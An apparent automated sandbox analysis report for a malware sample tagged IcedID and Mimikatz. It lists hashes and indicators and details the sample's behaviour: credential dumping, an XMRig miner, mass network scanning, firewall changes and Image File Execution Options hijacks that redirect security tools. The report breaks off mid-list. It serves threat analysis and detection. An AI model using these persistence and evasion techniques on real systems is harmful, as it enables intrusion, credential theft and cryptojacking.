Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
14-10-2024 07:01
Behavioral task
behavioral1
Sample
2024-10-14_6d5d08d435f227019b797da24fbdebfd_hacktools_icedid_mimikatz.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
2024-10-14_6d5d08d435f227019b797da24fbdebfd_hacktools_icedid_mimikatz.exe
Resource
win10v2004-20241007-en
General
-
Target
2024-10-14_6d5d08d435f227019b797da24fbdebfd_hacktools_icedid_mimikatz.exe
-
Size
9.7MB
-
MD5
6d5d08d435f227019b797da24fbdebfd
-
SHA1
3d7c9960f9d24a3d94bbc916d23b329dc76a719e
-
SHA256
d8f4c0d111a6ac360cd5974db1024213d65695dc8ae3335a56db8b137a8a6603
-
SHA512
b5bd712651f57aeaa76712b7e8ae57d185bf6613fbe8ae612a3a48cc68491656a54cd5bd193655ed15bbd1a287fd66b94370d848e0a1199d14bb72d4a05aad7d
-
SSDEEP
196608:7po1mknGzwHdOgEPHd9BbX/nivPlTXTYe:agjz0E57/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
ulchjqs.exedescription pid Process procid_target PID 212 created 2064 212 ulchjqs.exe 38 -
Contacts a large (20204) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 10 IoCs
Processes:
resource yara_rule behavioral2/memory/544-178-0x00007FF742960000-0x00007FF742A80000-memory.dmp xmrig behavioral2/memory/544-182-0x00007FF742960000-0x00007FF742A80000-memory.dmp xmrig behavioral2/memory/544-199-0x00007FF742960000-0x00007FF742A80000-memory.dmp xmrig behavioral2/memory/544-212-0x00007FF742960000-0x00007FF742A80000-memory.dmp xmrig behavioral2/memory/544-221-0x00007FF742960000-0x00007FF742A80000-memory.dmp xmrig behavioral2/memory/544-230-0x00007FF742960000-0x00007FF742A80000-memory.dmp xmrig behavioral2/memory/544-243-0x00007FF742960000-0x00007FF742A80000-memory.dmp xmrig behavioral2/memory/544-251-0x00007FF742960000-0x00007FF742A80000-memory.dmp xmrig behavioral2/memory/544-260-0x00007FF742960000-0x00007FF742A80000-memory.dmp xmrig behavioral2/memory/544-369-0x00007FF742960000-0x00007FF742A80000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
Processes:
resource yara_rule behavioral2/memory/4876-0-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/4876-4-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/files/0x000b000000023b91-6.dat mimikatz behavioral2/memory/4672-8-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/2940-138-0x00007FF6A33A0000-0x00007FF6A348E000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
Processes:
ulchjqs.exewpcap.exedescription ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts ulchjqs.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts ulchjqs.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
Processes:
ulchjqs.exedescription ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe ulchjqs.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ulchjqs.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ulchjqs.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ulchjqs.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe ulchjqs.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ulchjqs.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe ulchjqs.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe ulchjqs.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe ulchjqs.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe ulchjqs.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe ulchjqs.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ulchjqs.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe ulchjqs.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe ulchjqs.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ulchjqs.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ulchjqs.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ulchjqs.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ulchjqs.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ulchjqs.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ulchjqs.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ulchjqs.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ulchjqs.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ulchjqs.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe ulchjqs.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe ulchjqs.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ulchjqs.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe ulchjqs.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe ulchjqs.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe ulchjqs.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe ulchjqs.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe ulchjqs.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe ulchjqs.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ulchjqs.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe ulchjqs.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ulchjqs.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ulchjqs.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe ulchjqs.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ulchjqs.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ulchjqs.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe ulchjqs.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
Processes:
netsh.exenetsh.exepid Process 764 netsh.exe 1652 netsh.exe -
Executes dropped EXE 25 IoCs
Processes:
ulchjqs.exeulchjqs.exewpcap.exeuppqklzyi.exevfshost.exeiqykpunep.exexohudmc.exerwdxwq.exektqkck.exeiqykpunep.exeiqykpunep.exeiqykpunep.exeiqykpunep.exeiqykpunep.exeiqykpunep.exeiqykpunep.exeiqykpunep.exeiqykpunep.exeiqykpunep.exeiqykpunep.exeiqykpunep.exeiqykpunep.exeiqykpunep.exeulchjqs.exezihpsbpfp.exepid Process 4672 ulchjqs.exe 212 ulchjqs.exe 4412 wpcap.exe 4212 uppqklzyi.exe 2940 vfshost.exe 1464 iqykpunep.exe 1492 xohudmc.exe 920 rwdxwq.exe 544 ktqkck.exe 1648 iqykpunep.exe 3700 iqykpunep.exe 4764 iqykpunep.exe 2076 iqykpunep.exe 4936 iqykpunep.exe 4608 iqykpunep.exe 4032 iqykpunep.exe 4812 iqykpunep.exe 1612 iqykpunep.exe 5096 iqykpunep.exe 3940 iqykpunep.exe 1196 iqykpunep.exe 2368 iqykpunep.exe 3868 iqykpunep.exe 1496 ulchjqs.exe 2024 zihpsbpfp.exe -
Loads dropped DLL 12 IoCs
Processes:
wpcap.exeuppqklzyi.exepid Process 4412 wpcap.exe 4412 wpcap.exe 4412 wpcap.exe 4412 wpcap.exe 4412 wpcap.exe 4412 wpcap.exe 4412 wpcap.exe 4412 wpcap.exe 4412 wpcap.exe 4212 uppqklzyi.exe 4212 uppqklzyi.exe 4212 uppqklzyi.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 70 ifconfig.me 71 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
Processes:
ulchjqs.exewpcap.exexohudmc.exedescription ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft ulchjqs.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BB4F4B8E2B2CFC476849B6B724C153FF ulchjqs.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File created C:\Windows\system32\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE ulchjqs.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\rwdxwq.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 ulchjqs.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData ulchjqs.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BB4F4B8E2B2CFC476849B6B724C153FF ulchjqs.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 ulchjqs.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 ulchjqs.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content ulchjqs.exe File created C:\Windows\SysWOW64\rwdxwq.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies ulchjqs.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache ulchjqs.exe -
Processes:
resource yara_rule behavioral2/files/0x0007000000023c63-135.dat upx behavioral2/memory/2940-136-0x00007FF6A33A0000-0x00007FF6A348E000-memory.dmp upx behavioral2/memory/2940-138-0x00007FF6A33A0000-0x00007FF6A348E000-memory.dmp upx behavioral2/files/0x0007000000023c6e-141.dat upx behavioral2/memory/1464-142-0x00007FF701960000-0x00007FF7019BB000-memory.dmp upx behavioral2/memory/1464-160-0x00007FF701960000-0x00007FF7019BB000-memory.dmp upx behavioral2/files/0x0007000000023c6b-164.dat upx behavioral2/memory/544-165-0x00007FF742960000-0x00007FF742A80000-memory.dmp upx behavioral2/memory/1648-171-0x00007FF701960000-0x00007FF7019BB000-memory.dmp upx behavioral2/memory/3700-175-0x00007FF701960000-0x00007FF7019BB000-memory.dmp upx behavioral2/memory/544-178-0x00007FF742960000-0x00007FF742A80000-memory.dmp upx behavioral2/memory/4764-180-0x00007FF701960000-0x00007FF7019BB000-memory.dmp upx behavioral2/memory/544-182-0x00007FF742960000-0x00007FF742A80000-memory.dmp upx behavioral2/memory/2076-185-0x00007FF701960000-0x00007FF7019BB000-memory.dmp upx behavioral2/memory/4936-189-0x00007FF701960000-0x00007FF7019BB000-memory.dmp upx behavioral2/memory/4608-193-0x00007FF701960000-0x00007FF7019BB000-memory.dmp upx behavioral2/memory/4032-197-0x00007FF701960000-0x00007FF7019BB000-memory.dmp upx behavioral2/memory/544-199-0x00007FF742960000-0x00007FF742A80000-memory.dmp upx behavioral2/memory/4812-202-0x00007FF701960000-0x00007FF7019BB000-memory.dmp upx behavioral2/memory/1612-206-0x00007FF701960000-0x00007FF7019BB000-memory.dmp upx behavioral2/memory/5096-210-0x00007FF701960000-0x00007FF7019BB000-memory.dmp upx behavioral2/memory/544-212-0x00007FF742960000-0x00007FF742A80000-memory.dmp upx behavioral2/memory/3940-215-0x00007FF701960000-0x00007FF7019BB000-memory.dmp upx behavioral2/memory/1196-219-0x00007FF701960000-0x00007FF7019BB000-memory.dmp upx behavioral2/memory/544-221-0x00007FF742960000-0x00007FF742A80000-memory.dmp upx behavioral2/memory/2368-224-0x00007FF701960000-0x00007FF7019BB000-memory.dmp upx behavioral2/memory/3868-228-0x00007FF701960000-0x00007FF7019BB000-memory.dmp upx behavioral2/memory/544-230-0x00007FF742960000-0x00007FF742A80000-memory.dmp upx behavioral2/memory/544-243-0x00007FF742960000-0x00007FF742A80000-memory.dmp upx behavioral2/memory/544-251-0x00007FF742960000-0x00007FF742A80000-memory.dmp upx behavioral2/memory/544-260-0x00007FF742960000-0x00007FF742A80000-memory.dmp upx behavioral2/memory/544-369-0x00007FF742960000-0x00007FF742A80000-memory.dmp upx -
Drops file in Program Files directory 3 IoCs
Processes:
wpcap.exedescription ioc Process File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
Processes:
ulchjqs.execmd.exe2024-10-14_6d5d08d435f227019b797da24fbdebfd_hacktools_icedid_mimikatz.exezihpsbpfp.exedescription ioc Process File created C:\Windows\gktnbpatc\UnattendGC\specials\xdvl-0.dll ulchjqs.exe File created C:\Windows\gktnbpatc\UnattendGC\specials\vimpcsvc.exe ulchjqs.exe File created C:\Windows\gktnbpatc\upbdrjv\swrpwe.exe ulchjqs.exe File created C:\Windows\gktnbpatc\qkbhvgseb\scan.bat ulchjqs.exe File created C:\Windows\tqgebhig\schoedcl.xml ulchjqs.exe File created C:\Windows\gktnbpatc\Corporate\mimidrv.sys ulchjqs.exe File created C:\Windows\gktnbpatc\UnattendGC\specials\coli-0.dll ulchjqs.exe File created C:\Windows\gktnbpatc\UnattendGC\specials\schoedcl.exe ulchjqs.exe File created C:\Windows\gktnbpatc\UnattendGC\specials\schoedcl.xml ulchjqs.exe File created C:\Windows\tqgebhig\vimpcsvc.xml ulchjqs.exe File opened for modification C:\Windows\tqgebhig\svschost.xml ulchjqs.exe File opened for modification C:\Windows\tqgebhig\schoedcl.xml ulchjqs.exe File created C:\Windows\gktnbpatc\qkbhvgseb\zihpsbpfp.exe ulchjqs.exe File created C:\Windows\gktnbpatc\UnattendGC\specials\vimpcsvc.xml ulchjqs.exe File created C:\Windows\tqgebhig\docmicfg.xml ulchjqs.exe File opened for modification C:\Windows\gktnbpatc\Corporate\log.txt cmd.exe File opened for modification C:\Windows\tqgebhig\ulchjqs.exe 2024-10-14_6d5d08d435f227019b797da24fbdebfd_hacktools_icedid_mimikatz.exe File created C:\Windows\gktnbpatc\UnattendGC\specials\libeay32.dll ulchjqs.exe File created C:\Windows\gktnbpatc\UnattendGC\specials\ssleay32.dll ulchjqs.exe File created C:\Windows\gktnbpatc\UnattendGC\spoolsrv.xml ulchjqs.exe File created C:\Windows\gktnbpatc\UnattendGC\specials\libxml2.dll ulchjqs.exe File created C:\Windows\gktnbpatc\UnattendGC\specials\tibe-2.dll ulchjqs.exe File created C:\Windows\gktnbpatc\UnattendGC\specials\svschost.xml ulchjqs.exe File created C:\Windows\gktnbpatc\UnattendGC\specials\docmicfg.xml ulchjqs.exe File opened for modification C:\Windows\tqgebhig\vimpcsvc.xml ulchjqs.exe File created C:\Windows\tqgebhig\ulchjqs.exe 2024-10-14_6d5d08d435f227019b797da24fbdebfd_hacktools_icedid_mimikatz.exe File created C:\Windows\gktnbpatc\UnattendGC\specials\crli-0.dll ulchjqs.exe File created C:\Windows\gktnbpatc\UnattendGC\specials\zlib1.dll ulchjqs.exe File created C:\Windows\gktnbpatc\UnattendGC\specials\svschost.exe ulchjqs.exe File created C:\Windows\gktnbpatc\Corporate\mimilib.dll ulchjqs.exe File created C:\Windows\gktnbpatc\UnattendGC\vimpcsvc.xml ulchjqs.exe File opened for modification C:\Windows\tqgebhig\docmicfg.xml ulchjqs.exe File created C:\Windows\gktnbpatc\UnattendGC\AppCapture32.dll ulchjqs.exe File created C:\Windows\gktnbpatc\qkbhvgseb\ip.txt ulchjqs.exe File created C:\Windows\gktnbpatc\UnattendGC\specials\trch-1.dll ulchjqs.exe File created C:\Windows\gktnbpatc\UnattendGC\specials\spoolsrv.exe ulchjqs.exe File opened for modification C:\Windows\tqgebhig\spoolsrv.xml ulchjqs.exe File created C:\Windows\gktnbpatc\UnattendGC\Shellcode.ini ulchjqs.exe File created C:\Windows\gktnbpatc\UnattendGC\specials\exma-1.dll ulchjqs.exe File created C:\Windows\gktnbpatc\UnattendGC\specials\trfo-2.dll ulchjqs.exe File created C:\Windows\gktnbpatc\UnattendGC\specials\spoolsrv.xml ulchjqs.exe File created C:\Windows\gktnbpatc\UnattendGC\svschost.xml ulchjqs.exe File created C:\Windows\tqgebhig\spoolsrv.xml ulchjqs.exe File created C:\Windows\gktnbpatc\UnattendGC\AppCapture64.dll ulchjqs.exe File created C:\Windows\gktnbpatc\qkbhvgseb\Packet.dll ulchjqs.exe File opened for modification C:\Windows\gktnbpatc\qkbhvgseb\Packet.dll ulchjqs.exe File created C:\Windows\gktnbpatc\UnattendGC\docmicfg.xml ulchjqs.exe File created C:\Windows\gktnbpatc\UnattendGC\schoedcl.xml ulchjqs.exe File opened for modification C:\Windows\gktnbpatc\qkbhvgseb\Result.txt zihpsbpfp.exe File created C:\Windows\gktnbpatc\qkbhvgseb\wpcap.dll ulchjqs.exe File created C:\Windows\gktnbpatc\UnattendGC\specials\cnli-1.dll ulchjqs.exe File created C:\Windows\gktnbpatc\UnattendGC\specials\posh-0.dll ulchjqs.exe File created C:\Windows\gktnbpatc\Corporate\vfshost.exe ulchjqs.exe File created C:\Windows\ime\ulchjqs.exe ulchjqs.exe File created C:\Windows\gktnbpatc\qkbhvgseb\wpcap.exe ulchjqs.exe File created C:\Windows\gktnbpatc\qkbhvgseb\uppqklzyi.exe ulchjqs.exe File created C:\Windows\gktnbpatc\UnattendGC\specials\tucl-1.dll ulchjqs.exe File created C:\Windows\gktnbpatc\UnattendGC\specials\ucl.dll ulchjqs.exe File created C:\Windows\gktnbpatc\UnattendGC\specials\docmicfg.exe ulchjqs.exe File created C:\Windows\tqgebhig\svschost.xml ulchjqs.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exepid Process 4636 sc.exe 2908 sc.exe 3636 sc.exe 4792 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
netsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exedescription ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
net1.exenet1.exenetsh.exenetsh.execmd.exenet1.execacls.exenet.exenet1.exeschtasks.execmd.exesc.exerwdxwq.execmd.execacls.execmd.exenet1.exenet.exenet.execmd.exenet1.exenet.exexohudmc.exePING.EXEnet.exenetsh.exenetsh.execmd.exenet1.exenet.execmd.exenetsh.exewpcap.exenet1.execmd.execmd.exenetsh.exesc.exeulchjqs.exenet.exeschtasks.exenetsh.execmd.execmd.execmd.execmd.exenet.exenet.execmd.exeulchjqs.exenetsh.exezihpsbpfp.execacls.execmd.exenetsh.execmd.exenetsh.execmd.execmd.execmd.execacls.exenetsh.execmd.exeschtasks.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened 